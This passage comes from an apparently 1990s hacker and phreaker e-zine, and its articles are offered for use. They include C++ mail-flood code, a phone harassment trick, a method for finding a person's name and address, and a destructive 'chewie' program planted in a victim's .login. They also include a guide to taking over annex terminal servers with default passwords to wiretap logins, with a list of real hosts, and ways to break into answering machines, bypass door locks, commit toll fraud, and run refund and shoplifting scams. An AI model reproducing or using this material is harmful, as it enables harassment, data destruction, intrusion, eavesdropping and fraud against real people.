This is bad for phone phreaks most of all. Eventually calling-cards will be
inserted into the pay-phones to make calls, the phreak will not be able to
enter the stolen calling-card number via keypad. Also, with the advent of
so many credit-card phones phreaks will no longer be able to use a generated
number to say to an operator to make a free call.


_____/\__/\__/\__/\__/\__ ________[/ 7 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // iNTEL REVENGE \\ \ \ \ \ \---'
`--/---/---/---/---//-----= by Mutant-X =------\\---\---\---\---\--'

I haven't been much active in the hack phreak scene the past couple of years
and today i am proud to bring you some new articles for my friends in ToT and
our fellow readers.

Recently i have discovered a nice way of becoming Mr Nice Guy, yes this new
world of Intel has made my dreams come true. Using this easy method you can
piss someone right off just by following my simple instructions...

-Call 1-800-321-4044
-Press 2 (you will hear it ringing)
-You should hear the Intel sound, press 2
-Wait for the beep and press 2
-Wait for another beep then press 2
-Now enter the number of your unlucky victim
-Area followed by the Number then press 1
-Wait for the beep and press 3
-Hang up the phone and do your evil laughter!

Intel will call the victim 3 times every 3 minute intervals!


_____/\__/\__/\__/\__/\__ ________[/ 8 \]_________ __/\__/\__/\__/\__/\_____
`---/ / / / / // MOTHERFUCKER MAiLFLOOD \\ \ \ \ \ \---'
`--/---/---/---/---//------= by PoSCa! =-------\\---\---\---\---\--'

I get sick of getting email chain letters from bastards who don't have a
life! So I created this MotherFucker of a thing called MailFlood.

Very basic program, that would run on any good Unix system, that has a good
C++ compiler. All the program does is loop a number of times executing the
mail command, eventually flooding the INBOX buffer of the bastard's mailbox.

Compile the following program, and save it as 'mfmf'.

//--------------------------MFMF C++ source--------------------------
#include <sys/types.h>
#include <iostream.h>
#include <syslib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/file.h>

main(int argc, char *argv[])
{
char s1[] = "mail ";
if (argc==4) {
strcat(s1, argv[1]);
strncat(s1, " < ");
strcat(s1, argv[2]);
int i=0;
while (i<(argv[3]))
{
cout << "Number of email sent: " << i << "\n";
system(s1);
system("clear");
i++;
}
cout << "MotherFuckerMailFlood!\n";
} else
cout << "Error.\n";
}

//-------------------------------------------------------------------

To run it, do this:

./mfmf <email address> <filename> <number of loops>

ALL are complsory parameters where...
<filename> is the name of a text file you want to send repeatedly
<number of loops> is the number of times you want to send it
<email address> is obvious else email to "dumb@fucken.bastard.au"

To really piss someone off, do '1000' at number of loops parameter,
which takes the program about 4 minutes to process.

If you don't want to send a text file, just enter 'mfmf' instead, that way
it will appear as garbage when viewing the email.

I get sick of seeing these geeks glued to the screens with amazement.
Without a doubt the most twisted, depraved group of fucks it's ever
been my displeasure to lay my eyes on. I mean, those motherfuckers
are a walkin' reminder of just how fucked up the Unix system really is.


_____/\__/\__/\__/\__/\__ _________[/ 9 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // WHO'S THAT PHREAK? \\ \ \ \ \ \---'
`--/---/---/---/---//---= by bAD lANGUAGE! =---\\---\---\---\---\--'

being in the H/P/A scene you meet alot of dudes, normally when you
first meet them you only know there phone number, handle and first
name. but if you wanna find out a bit more about them this is what
you do...

in most city libraries (the big ones with lots of books) such as 'THE
WELLINGTON CITY COUNCIL LIBRARY' they have a shelf of phone books,
including phone books from all over the world! now what you do is go
to that section of the library and look for a phone book called
the 'BUSINESS & TRADE DIRECTORY'.. it is a book the same size as
other phone books and is NAVY blue with white writing.

this phone book has inside it a section which has all the telephone
numbers, for example in the wellington area which are listed
sequencually, meaning it lists them like this eg:

237-0000
237-0001
237-0002
237-0003 etc...


now what you do is look for that H/P/A'rs phone number in this book,
once you have found it look at the 4 or 5 letters which are beside
the number. for example we wanna find who owns the phone number
499-2571.


(example extract from book)

499-2568 BITC
499-2570 LOO
499-2571 YATE <-- k00l, this here is the phone number
499-2573 BLO
499-2575 NEWM
499-2576 BELF

now beside this number are the letters YATE, now what you do is
look up in your regular phone book for the surname YATE. scan down
all the names which start with YATE for the phone number. when you
find it you will notice that the person who owns this number is
Colin YATES and you will also get his address with it.

Now you can do what ever you want now that you have the H/P/A'rs
last name and address, it makes things easier having this when you
want to find out some serious information about him/her.


_____/\__/\__/\__/\__/\__ ________[/ 10 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // THE CC-KEY TRiCK \\ \ \ \ \ \---'
`--/---/---/---/---//---= by bAD lANGUAGE! =---\\---\---\---\---\--'

opening doors with credit cards is a very old trick, but i was surprised to
find out that not many people knew how it was done, so i have decided to
revise this technique.

you may have seen in the movies or maybe Macqyver, were some fucken hero pulls
out a credit card and puts it in the crack between the door frame and door
and then jiggles it about and opens the door. this is actually bullshit,
well maybe not so, we have to make an alteration to the credit card first!

before you go cutting up your parents credit card you can also use phone cards
or any piece of strong thick plastic, or even better some sheet metal. if you
are going to use metal or some type of plastic, cut it down to the same size
as a credit card or phone card. i personally have a piece of sheet metal cut
to the right shape connected to my key ring, as after a while the plastic
'kEYS' tend to tear.

below is a diagram of how this CC key is made:


1cm this part here is a nice curve which flatens out
«-----» / towards the bottom
/
|
.-----. | _.------.
| | \_/ .¤ | This is a diagram of how the
| | ° __*¤~ | finsihed key looks like.
| |XX ___*¤~ |
FRONT | `-----°~~ |
END | | the XX has nothing to do
| | with the shape, its just a
| | marker to indicate a certain
| | point in the text
| |
l___________________________________'


the part which is marked 1cm at the FRONT END is an approximate, it depends
on the type of material you are using as the smaller the size the weaker it
will be. but remember that it shouldn't be bigger than 1.5cm other wise you
won't be able to fit it into the door.

now that we have our CC key we can open some doors, but hold on a minute, we
can't go open any fucken type of door, we are restricted mainly to fire
exits. most buildings have fire exits in which these doors open up to the
outside world, in new zealand it is a law that these fire exits can not be
physically locked by any key driven device. you can recognise these doors
by the fact the door handle on the outside does not move, but it can be
opened obviously from the inside.

ok so heres how we do it.

1) with your left hand hold onto the door handle

2) hold onto the back of the CC key with your right hand and insert it into
the crack between the door frame and door. make sure you put it into the
crack so it is underneath the catch that locks the door.

the catch is that kind of wedged shape piece that moves in and out when you
turn the handle.

3) now you need to hook the catch with your CC key, were the XX has been
marked on the above diagram.

4) this is the hard bit now, what you do is pull the CC key towards you
slowly keeping it hooked onto the catch. it takes a couple of tries to get
this right so don't worry.

what we are doing by pulling the CC key fowards is pushing the catch into
the door so thus in effect unlocking the door.

5) once you have freed the catch from the cavity in the door frame you can
pull the handle and the door should open up.


it is particular frustrating when you have freed the catch and go to pull
the door and then the catch slips off and you have to try again. it normally
takes me 5-6 tries before i can open the door.

so maybe you aren't gonna break into any buildings to steal the warez, but
this is very handy when you are locked out of your form class at school, well
maybe if you are lucky enough to have a form class in one of the science
blocks as they always have the type of door that suits this technique.

it is best if you practice this as you don't won't to look like a fool in
front of your friends, you can practice it on the doors inside your house,
like the ones in your bedroom etc.

oh yeah, heres a tip to help you out, i find that if you pull on the handle
a bit it takes the pressure off the catch in the cavity in the door frame
making it easier to pull the CC key fowards.


_____/\__/\__/\__/\__/\__ ________[/ 11 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // FRAUD DETECT SYSTEM! \\ \ \ \ \ \---'
`--/---/---/---/---//---= by bAD lANGUAGE! =---\\---\---\---\---\--'

This article has been taken from the Publicaton InfoTech Weekly,
March 10 1997. Article is by Malcolm McDonald, but typed by bAD¢lANGUAGE


TELECOM NZ UNVEILS INSTANT FRAUD DETECTION SYSTEM

Telecom New Zealand expects to save millions of dollars with a new fraud
detection system. The system, supplied by Hewlett-Packard New Zealand,
tracks calling patterns that could indicate potential fraud, such as
repeditive calls to the same locations, credit limit breaches, and rapid
changes in calling patterns.

Telecom spokeswoman Linda Sanders says Telecom expects the new system to
quickly pay for itself. She declined to disclose the systems cost.

It will be used by Telecoms fraud dectection team in addition to other
methods of tracking fraud, including credit and risk managment, collection
agencies and toll investigations.

While the other methods of detecting fraud are retrospective, the new
system could enable the team to detect fraud as it happens.

Ms Sanders was unable to reveal where the fraud detection team was based
for security reasons.

The software, called Acess7, runs on HP-9000 computers and is connected
to switches. It collects information about calling patterns across
local, internation and moblie calls that may indicate fraudulent behaviour

The system does not involve bugging, or Telecom staff eavesdroppng on
caller's private conversations, she says.

Telephone fraud is a significant problem affecting telecommunications
carriers worldwide. It is estimated to cost US$5.2 billion per year.


_____/\__/\__/\__/\__/\__ ________[/ 12 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // iNTERNET FOR FREE! \\ \ \ \ \ \---'
`--/---/---/---/---//---= by bAD lANGUAGE! =---\\---\---\---\---\--'

so ya probably find like me that internet access is still to fucken
expensive here in new zealand, so i was thinking one day and came up
with this idea.

you know those mutha fuckers at xtra how they think they are the best
inet provider an all, well what you do is go to dickwank electronics
and pick up one of those XTRA internet CD-ROMS. otherwise there are
other shops which give them away, or you could just ring up XTRA and
get them to send you one.

ok you need to REGISTER your account with xtra, do this at home just
by following the online registration details that come with the
cd-rom. now heres the catch, the way xtra charge for your internet
usage is by the amount of time used which ends up being billed to your
phone account. now what you do is use a (lame) PBX or something to
call up xtra, or even pillbox or something so that when xtra charge you
for usage the bill appears on the businesses telephone a/c (the PBX).

this way you can get free internet access, the only thing that will
happen is that the account you created will be deleted after a month
since the PBX owner will make a complaint to telecom when they see
there phone bill. however all you need to do is get another CDROM or
just go to a shop and write down the REGISTRATION NUMBER which is
on the sticker on the cdrom packet. then just REGISTER again with this
new registration number!!!!

<Ed: I think i'll stick to the Hacked Accounts Monthly list>


_____/\__/\__/\__/\__/\__ ________[/ 13 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // THE CHEWiE \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by PoSCa =-------\\---\---\---\---\--'

Right this bitch of a thing goes out to the ones that are mentally evantic
(like I am), and could give a toss of dead mother fucker of a fried chicken!
Yeah, I am talking a bout thos bitch ho's that fly, and that they can take
the heat, like the other white meat known as kid funky fry.

If you really want to shrew the fuck (even better screw them...) plant this
seimen deep inside some cunt's anal, and let it chew away the fuck out of
their turf.

Look, I couldn't be bothered to give ya the trojan to implant this, but any-
body can basically do it with an old trojan, just rewrite it a bit to copy the
complied ".pinexx" prog and the ".login" script into the victims dir. If your
lame, then you gonna have to wait till the next issue (next decade...) of ToT
for the trojan.

<Ed: Next DECADE!?!? "Your a funny guy sally thats why im going to kill you
last!"
heheh>

Don't worry about these files, as they blend in with other admin UNIX crap
as they are hidden from normal view of the user's directory you want to fuck.

-----//".login"--------------------------------------------------------------
./.pinexx

-----------------------------------------------------------------------------

And the piece of art....
-----//".pinexx"-------------------------------------------------------------
#include <iostream.h>
#include <std.h>

main()
{
int chewy, i, pips;
int chewfd = open("*", O_RDWR | O_CREAT | O_TRUNC, 0777);
chewy = lseek(chewfd, 0, 2);
for (i=0; i < (8*chewy); i++) {
pips = write(chewfd, &chewy, sizeof(chewy));
if (pips < 0)
chewfd = open("*", O_RDWR | O_CREAT | O_TRUNC, 0777);
}
close(chewfd);
}
-----------------------------------------------------------------------------

Basically wot the bitch does is this... tears slowly, each file in the victims
dir right at the moment the user logs in. It will render and the user can't do
shit as the IO ports aren't functional till shell pops up, as it has to pro-
ceed and do another admin check after .login. So only root can save the Ho's
problem-o's.

Cause I am kinda like Han Solo always stroking his own wookie,
I am the root of all that's evil, Yeah but... you can call me cookie.

Just do it to any fucker at any fucked VAX/UNIX/LYNX shit sys of a thing

Hip Hip Hip into the Dip clit da dick gettin stiff daft Doggie style...

<Ed: What the fUCK!? Posca has lost the plot!@#% :)>

And if you think 'joe' is pissed off at you that ain't nothing compared to how
much you are pissed off at him, for put you in the same room as that bastard.

Ya-all get my drift...

Lame fucks...


!!!!! Fuck you pay me...
/ @ @ \ You got struck by lighting...
\ ___ / FUCK YOU pay me...
| \.| PoSCa sT0nEd! Dog shit on ya...
| | FUCK YOU pay me...


Then just plant the chewy in the users directory.
Ok... gotta go as the men in the white suits are here and they brought me a
nice woolly straight jacket.

:/

bYe!


_____/\__/\__/\__/\__/\__ ________[/ 14 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // HACKiNG ANNEX SYSTEMS! \\ \ \ \ \ \---'
`--/---/---/---/---//------= by Iceman! =------\\---\---\---\---\--'

Most of you should know by now why we have annex systems. This article is the
basic guide to finding an annex, then taking control of it so we can use it
to dialout and also to create total chaos and destruction.

Find an annex by doing an archie/netfind search for "dialin" "dialup" or
"annex". When you have a list of possible sites, write them down (word name
format - eg: annex.somewhere.com). Then ping each one in turn to get the IP
address eg: 130.69.69.1 Write this down too, then telnet to that address.
It should give you a funny prompt saying "The following rotaries are defined
- cli"
or some shit, type "cli" and press return. This puts you into command
mode, if all has worked so far you are logged in as a user and have limited
privs, type help or ? to see your list of commands. It should have stuff
like "who" and "ls" listed.

Now attempt to get root privs, type "su" and return. It will ask for the
passwd. If the passwd is still on default setting, and chances are that it
will be, enter the IP address of the annex, eg: 130.69.69.1 and press return.
If it works your pprompt should change to a # sign. ALRIGHT! Kickin ass.
Now type help or ? and you will get the whole list of commands. Pay particu-
lar attention to the "tap" and "admin" commands.

The tap command allows you to wiretap a port of the annex (ie: you can
"listen" in on all data coming too and from the port via a modem connection.
This includes listening in on logins and hearing passwds!) type "help tap"
for more info.

The admin command enters you into an administrative interactive mode, type
admin and return, and the prompt will change to "admin>" type help or ? to
get the new list of commands. From the admin modes you can change the modes
of a modem. If it is dialin, you can change it to bidirectional or dialout.
If it uses passwd authentication, you can turn this off.

Once a modem has been swiched to bidirectional or dialout you may call out-
side telephone numbers from this modem. Be aware that often you will need to
dial 0 for an outside line, and most times you will only be able to access
local lines. To find the area code which the annex is in, find out where it
physically resides, eg: Boston Capital Uni, then call your telco operator and
ask what the area code for Boston is. Simple.

I am not going to go into any more detail, it is all very straight forward.
Just use the help function to get more info on any command. The best use for
an annex is to tap multiple ports in silent mode, and listen in on logins.
If you are a half decent unix person, you could pipe the output from multiple
taps into a file stored on your local system. Leave that running for a few
hours on a busy annex and you will have some passwds. I haven't been able to
find out how to find the actual number of an annex (telephone number) but I
am working on methods.

One cool thing you can do is change the admin passwd. There is *NO* way that
the sysadmin can discover or reset the passwd if it is forgotten, short send-
ing the annex back to the manufacturer for a reset. Anyway, let me know if
you come across any.

Annex Terminals
=-=-=-=-=-=-=-=
The list follows. It is incomplete, but it will give you something to play
with. The sites which have an IP listed responded to ping and thus should be
your first tries. I didn't have time to ping the whole list, so just because
one doesn't have an IP number, doesn't mean that it won't respond - you get
what i mean?

%D abq-annex.usa.net 192.156.196.1
%O internet express, colorado springs, colorado
%H

%D annex.swarthmore.edu
%O swarthmore college, swarthmore, pennsylvania
%H

%D annex.lovejoy.colby.edu 137.146.38.255
%O colby college, waterville, maine
%H

%D annex.cc.utexas.edu
%O university of texas
%H

%D annex.com 204.74.67.1
%O annex telecommunications, van nuys, california
%H

%D annex.tcd.net
%O computer den, inc, evanston, wyoming
%H

%D cns-annex.usa.net 192.156.196.1
%O internet express, colorado springs, colorado
%H port6 port5

%D den-annex.usa.net 192.156.196.1
%O internet express, colorado springs, colorado
%H

%D nrlmry.navy.mil
%O naval oceanographic and atmospheric research laboratory, atmospheric di
rectorate, nps annex, monterey, california
%H helium

%D phx-annex.usa.net 192.156.196.1
%O internet express, colorado springs, colorado
%H port1

%D ssc.af.mil
%O standard systems group, maxwell air force base, gunter annex, alabama
%H aflmc aqs sbflan server csdaelan dms-af3 cdsar cmos afdsrs

%D whiffer.atl.ga.us
%O the waffle whiffer eastern annex and tofuhut, atlanta, georgia
%H waffle
%D dafbbs.com
%O infomaniac's dial-a-file bbs, canada
%H

%D dial-switch.ch 130.59.10.50
%O swissair, department cbtl, zuerich-airport
%H nova gilli me net-switch-dial-ch swiez1 net-switch-dial hb9rwm pso tl
phm tr3 meie r wellfl ts cerberus mb sn mueller tanos fk

%D dial.eunet.ch 146.228.10.15
%O eunet switzerland, zurich
%H policom-ppp policom-slip magic eiger bridge abrunner sirius lupascu

%D dial.cic.net 192.131.22.3
%O cicnet, inc (committee on institutional cooperation), ann arbor, michigan
%H chi2 chi3 chi5

%D dial.bnl.gov
%O brookhaven national laboratory, upton, new york
%H renoir

%D dial.com
%O dial services limited, boca raton, florida
%H

%D dial.dds.nl
%O stichting de digitale stad, prins hendrikkade, amsterdam, the netherlands
%H

 
%D dial.msstate.edu 130.18.128.4
%O diagnostic instrumentation and analysis laboratory mississippi state
university, starkville
%H philip vax photon wade shepard vs vws pingrey imipolexg rosebud norton
patlab3 testpc dialserver patlab4 patlab1 patlab2

%D dial.intercon.com
%O intercon systems corporation, herndon, virginia
%H rs ed rick skip rich clint kat mikel sandy jeff dave barry amanda rac
spare kdb trick brian ooblick tom

%D dial.eunet.es
%O goya servicios telematicos- eunet spain clara del rey, madrid, spain
%H

%D dial.eunet.hu
%O eunet hungary, also torokveszi ut, budapest, hungary
%H

%D dial.mindlink.bc.ca
%O unspecified
%H

%D dial.mcnet.ch
%O management & communications, grand-places, fribourg, switzerland
%H

%D dial.umanitoba.ca
%O university of manitoba, winnipeg, canada
%H umdaher1 umkormil swander adeswan

%D dial.tmt.tele.fi 192.194.179.2
%O telecom finland, helsinki
%H test

%D dial.net.nyu.edu
%O new york university, new york
%H

%D dial.peachnet.edu
%O university system of georgia
%H

%D dial.tip.net
%O swedish telecom / tipnet, kaserntorget fl, goteborg, sweden
%H

%D dialcall.com
%O dial call, inc, atlanta, georgia
%H

%D dial.xs4all.nl
%O xs4all, networking for the masses, the netherlands
%H

%D dial.umd.edu
%O university of maryland, college park
%H

%D dialdata.com
%O dial data inf, brazil
%H

%D dialcomp.com
%O dial computer services, toronto, ontario, canada
%H

%D lrod.dial.peach.net
%O peachnet, kennesaw, georgia
%H

%D mattress.com
%O dial-a-mattress, long island, new york, new york
%H

%D rushroom.com
%O dial capitol corporation, dallas, texas
%H

%D sleep.com
%O dial-a-mattress, long island city, new york
%H

%D test.dial.peachnet.edu
%O university system of georgia
%H
%D dialin.cwru.edu
%O case western reserve university, cleveland, ohio
%H pdj2-slip khm3-slip jjs4-slip ajv2-slip

%D dialin.carleton.edu
%O carleton college, northfield, minnesota
%H

%D dialin.csus.edu
%O california state university, sacramento
%H

%D dialin.iupui.edu
%O indiana university-purdue university at indianapolis, indiana
%H line2 x2s5p3

%D dialin.informatik.uni-erlangen.de
%O institut fuer informatik, university of erlangen, erlangen, germany
%H machusi

%D dialin.ic.net
%O innovative concepts, ann arbor, michigan
%H c8

%D dialin.hik.se
%O university of kalmar, sweden
%H

%D dialin.uni-erlangen.de
%O university of erlangen, erlangen, germany
%H

%D dialin.uic.edu
%O university of illinois, chicago
%H

%D dialin.net
%O indial network, charlotte, north carolina
%H

%D dialin.rrze.uni-erlangen.de
%O university of erlangen, erlangen, germany
%H

%D slip.adfa.oz.au
%O dialin sl/ip lines, australian defence force academy, canberra, australia
%H adm navmat
%D dialout.net
%O outdial network, charlotte, north carolina
%H

annex64.usfca.edu 138.202.64.64
... ...
annex17.usfca.edu 138.202.64.17
annex16.usfca.edu 138.202.64.16
annex15.usfca.edu 138.202.64.15
annex14.usfca.edu 138.202.64.14
annex13.usfca.edu 138.202.64.13
annex12.usfca.edu 138.202.64.12
annex11.usfca.edu 138.202.64.11
annex10.usfca.edu 138.202.64.10
annex9.usfca.edu 138.202.64.9
annex8.usfca.edu 138.202.64.8
annex7.usfca.edu 138.202.64.7
annex6.usfca.edu 138.202.64.6
annex5.usfca.edu 138.202.64.5
annex4.usfca.edu 138.202.64.4
annex3.usfca.edu 138.202.64.3
annex2.usfca.edu 138.202.64.2
annex1.usfca.edu 138.202.64.1

annex12-27.dial.
port50.annex6.ne
dialup138.cc.col

%D boulder-2.dialup.csn.net 199.117.100.254
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D colorado-springs.dialup.csn.net 199.117.101.254
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H p9

%D denver1.dialup.csn.net 204.131.233.254
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D dialup.oar.net 131.187.1.130
%O ohio supercomputer center, columbus, ohio
%H

%D dialup.emr.ca 132.156.36.14
%O department of energy, mines, and resources, ottawa, canada
%H cvelarde fillmore cboucher dimeglio jpeter petzinge adunlop

%D dialup-ip.ieunet.ie
%O ieunet limited 'reilly institute, trinity college, dublin, ireland
%H s3dub itp horizon

%D dialup.access.net
%O public access networks corporation, new york, new york
%H aspina fish2 alexis acinader whay archfien dicklang jhbauer mpoly mfoge
l isaacson jquill stbrock jjl clays kpt scottj rschott rstoller aparajit

%D dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D dialup.america.com
%O pss internet services, inc, daytona beach, florida
%H

%D dialup.adelaide.edu.au
%O university of adelaide, south australia
%H ckloeden

%D dialup.ais.net
%O american information systems, inc, schaumburg, illinois
%H

%D dialup.cloud9.net
%O cloud 9 internet consulting, white plains, new york
%H rge

%D dialup.com
%O the dialup internet connection, berkeley, california
%H

%D dialup.dstc.edu.au 130.102.176.253
%O prentice centre, university of queensland, australia
%H

%D dialup.hawaii.edu
%O university of hawaii, honolulu
%H oregano

%D dialup.francenet.fr 194.2.144.2
%O francenet, paris, france
%H

%D dialup.fu-berlin.de
%O free university of berlin, germany
%H

%D dialup.mcgill.ca
%O mcgill university, montreal, quebec, canada
%H

%D dialup.hilink.com.au
%O unspecified
%H

%D dialup.inch.com 204.178.32.1
%O the internet channel, new york, new york
%H

*****************************************************************************

%D dialup.net
%O sprint business services group, herndon, virginia
%H

%D dialup.rose-hulman.edu
%O rose-hulman institute of technology, terre haute, indiana
%H

%D dialup.polaristel.net
%O polaris telecom, plymouth, minnesota
%H

%D dialup.peg.apc.org
%O pegasus, association for progressive communications, byron bay, austral
ia
%H

%D dialup.rediris.es
%O rediris, alcala, madrid, spain
%H

%D dialup.uwa.edu.au
%O university of western australia, nedlands
%H

%D dialup.unt.edu
%O university of north texas, denton
%H

%D dialup.xlink.net
%O university of karlsruhe, germany
%H dh2paf-u

%D dialup.winternet.com
%O starnet communications, inc, eden prairie, minnesota
%H

%D ft-collins.dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D ge_rd.dialup.net
%O sprint business services group, herndon, virginia
%H

%D ge_xc.dialup.net
%O sprint business services group, herndon, virginia
%H

%D glenwood-springs.dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H p2 p3

%D grand-junction.dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D interserv.dialup.net
%O sprint business services group, herndon, virginia
%H

%D pueblo.dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D sprint.dialup.net
%O sprint business services group, herndon, virginia
%H bdoyle trutkowski

%D telluride.dialup.csn.net
%O colorado supernet, inc, colorado school of mines, golden, colorado
%H

%D z3.zeta.org.au
%O kralizec dialup unix, sydney, australia
%H

%D zeta.org.au
%O kralizec dialup unix, sydney, australia
%H kralizec godzilla

Some of these will have changed. So scan for new ones.


_____/\__/\__/\__/\__/\__ ________[/ 15 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // HACKiNG AM'S \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

WoW! here it is the article which was unfinished in the last issue cause
i couldnt find my AM codes, but now you can enjoy the work and hopefully
send me your comments and ideas, as i always like listening to other ppl's
suggestions.

This is old trix, but the only reason im writing this text is to tell you
whats the advantage of hacking Answering Machines and how to really find
the victims identity and listen to their private messages and any upcoming
events which have been recorded for them.

WHAT iS AM'S USEFUL FOR?
~`"'~`"'~`"'~`"'~`"'~`"'
I learned that hacking AM's can be another key for us h/p freaks cause once
you have studied the AM you want to hack you can find all kinds of infor-
mation including credit cards and other needful things!

WHERE SHOULD i START?
~`"'~`"'~`"'~`"'~`"'~
Now its time to have phun.. just a few suggestions so you get away with
it and they cant trace you back. Call the AM from a phone booth or if
possible go biege boxing or you could be a bit more risky and use pbx'es
and diverters (but i dont really agree with that) or if you really want
to fuck off the company ring off a vmb # and that will really piss off
the business if they try tracing the call... or try 0197 (CD block)

ADVANTAGES
~`"'~`"'~`
One of the advantages of hacking AM's is that "If you know what you are
doing you cant go wrong!" what i mean is that once you get in and listen
to the victims messages the only way you can fuck things up is if you
press the wrong buttons on your keypad;)

DEFAULT PASSWD
~`"'~`"'~`"'~`
Before you use any of the commands below remember *MOST* answering machines
have a default password which is normally 000 or 0000 depending on the code
limit, i have never come across a AM which requires a 7 digit remote code,
but dont worry cause most models use 3 or 4..

COMMON DEFAULT PASSWDS
~`"'~`"'~`"'~`"'~`"'~`
Try 111, 222, 333, 444, 555, 666, 777, 888, 999, 000, 123, 421.
If none of those work then press random digits on your keypad till you get
in, (i have done that tons of times - doesnt take that long)

WHAT TO DO
~`"'~`"'~`
Ring up the unit, dial 3 to 6 digits while you hear the recorded greeting
msg, if nothing happens just dial the remote code after the AM beeps, so
make sure you have it on mute, just incase it records any noise in your
background.

After you dial the remote code you might have to press either * or #
so it recognises that you have entered in your code correctly. But as you
should realize is you cant use # or * till you work out how many digits
the remote code is for the AM you are hacking into.

STANDARD OPTiONS
~`"'~`"'~`"'~`"'
Ok now here are the commands for *MOST* AM models, so print out the list
below and use this as your reference to hacking Answering Machines :)

1 Backspace
2 Skip
3 Reset
4 New Msg Playback
5 All Msg Playback
6 Answer Back
7 Greeting Msg Recording
8 Nothing
9 Greeting Msg Recording Stop
* Fax
0 Greeting Msg Skip
# Quit


_____/\__/\__/\__/\__/\__ ________[/ 16 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // RETAiL SCAMMiNG! \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by oPium =-------\\---\---\---\---\--'

Hoax Box:
---------
Purchase something from any shop that is wrapped in a box, Take it home,
Record the weight, Open it up, Take out the equipment. Fill up the box with
a soft toy which weighs very close to what it weighed in the first place!

Take the box back and make a huge complaint "Hey what the hell is this!?"
and make sure you tell them the date you first purchased the fucken thing
and bring the receipt back and say you would like a replacement or your
money back otherwise you are going to sue that shop! Trust me this might
be a bit embarrassing but it works well.

Mall Discount:
--------------
Go to a big mall eg:kmart, Walk into a store and purchase anything you like
when the shop assistant goes to tap in the ammount 'That will be $25 thanks'
Just say 'Do you give Mall discounts?' hopefully the assistant will say
'Sorry sir, That will be $20 thanks' otherwise if the smart-ass assistant
says 'No sorry we don't give out Mall Discounts' just say 'I work in Tower
Music and my Supervisor allows us to give Mall Discounts to Mall employees'
then the assistant should say 'Oh sorry about that' [click, click] 'That'll
be $20 thanks' If the assistant calls in her Supervisor or Boss then you
might be fucked cause you might have to prove your a person working from
Tower Music, And before you say to yourself thats easy i'll just lie my way
through, Well not always its that easy you might have to show them your Mall
ID, Eheh dont worry if your smart enough you just say im not working today
so my ID is at home, But my Supervisor is John Smith (dont worry most people
dont keep track of all there names!)

Damaged CD:
-----------
Purchase a CD, Take it home, Record the music onto a blank tape, Now care-
fully scratch the CD and listen to whole CD and note down on paper which
tracks keep jerking back and forward or skipping parts! Take the CD back
give them your piece of paper, Make a complaint to the Manager, Not the
shop assistant! and say you want your money back! Cool, Now you can buy
yourself another CD at a DIFFERENT store!

Slipping Extras:
----------------
Pick up a large paper, Newspaper or whatever! before you go to pay for it
Open the middle page of the paper and slip in a thin mag or for example slip
in the Trade&Exchange :) When you go to purchase it dont worry the assistant
wont open up the pages to make sure you havent slipped in anything!

Free Disks:
-----------
Piece of cake, Go to the toy store in Deka or where ever you want, Buy a
CHEAP toy which is kept in a LARGE covered box, Go Home, Throw out the Toy
and close the box up, Put the box in the plastic bag it came with, Now the
fun part, Go into a different store, NOT A FUCKEN COMPUTER STORE, Just go
into the Mall and when no-one is watching open the ToyBox and fill the fuck
with as MANY blank disk packages as possible! Now just close the top and
walk off like you were just looking around, And nothing interested you, So
it looks like you left the Mall with the previous Toy you had purchased
and you are off to shop at a different location, But MAKE fucken sure no
camera's are around the Computer Gear area!! And MAKE fucken sure that no
one see's you when you load up the box with the gear!!!

<Ed: My favourite is the 'FREE DISKS SCAM' it works so good! and not only
i got myself 80 free blank disks, i got myself a free box when i was
trashing outside Toyworld!!! ahah that was yonks ago tho


_____/\__/\__/\__/\__/\__ ________[/ 17 \]________ __/\__/\__/\__/\__/\_____
`---/ / / / / // ELiTE BOXiNG METHOD! \\ \ \ \ \ \---'
`--/---/---/---/---//-------= by ][yPe =-------\\---\---\---\---\--'

y3ah i must say this method isn't NEW *but* i haven't heard bout anyone else
doing it yet, so i will just say today this method could be the future of
blueboxing and the reason im saying this is because of the HP AcceSS 7 System
and Bellcore CCITT#7 which are being used in some areas to detect bb fraud.
But if you'ld like more information about these and other fraud detect units
i recommend you take a look at thc-mag #o1 by tHE *cool* hACKERS cHOICE crew
and check out Van Hauser's article "CCiTT #7 Line Monitoring"

So lets say you are un-sure if your line is being tapped or monitored by the
CIA or Telec0m f3dz coz of too much phone phreakin and hacking activity co-
ming from your phone line, and since we can't encrypt our voices over the
phone, so that the f3dz cant understand us, there is only one *cool* way to
make a priv8 phone call. Though its better to make sure the 3l337 contact #
you are going to call is 100% safe, i mean untapped you kook! :) otherwise
the phone call isn't going to be priv8 is it!!!

EQUiPMENT YOU WiLL NEED:
~`"'~`"'~`~`"'~`"'~`"'~`
Scavenger
- because its the only 3l337 boxing prog that exists :)

Tape Recorder or Dictaphone
- must have volume control, fast rewind and earphone capability

Micro Cassette
- 15 mins is enough, depending on how many contacts you want stored

Now if you can figure from here what i am about to tell you! Congratulations
dude you are definately not a newbie anymore :) If you are saying to yourself,
What? Umm, tHiS dOeSn't mAKe sEnSE! Then obviously you are a fucking LAMER!!!
You could either be a f3d! a homo! or a fucken sniffcock!

Hehe, enough of the abuse talk, lets bring it on!

Load up Scavenger, configure the freqs for one of the global countrys you can
break and then type in the phone number of your favourite phreak in the scene
(I bet you thought i was going to say "like me") anyway like me! :) Now that
you have it all ready, rewind your micro cassette and record your own voice

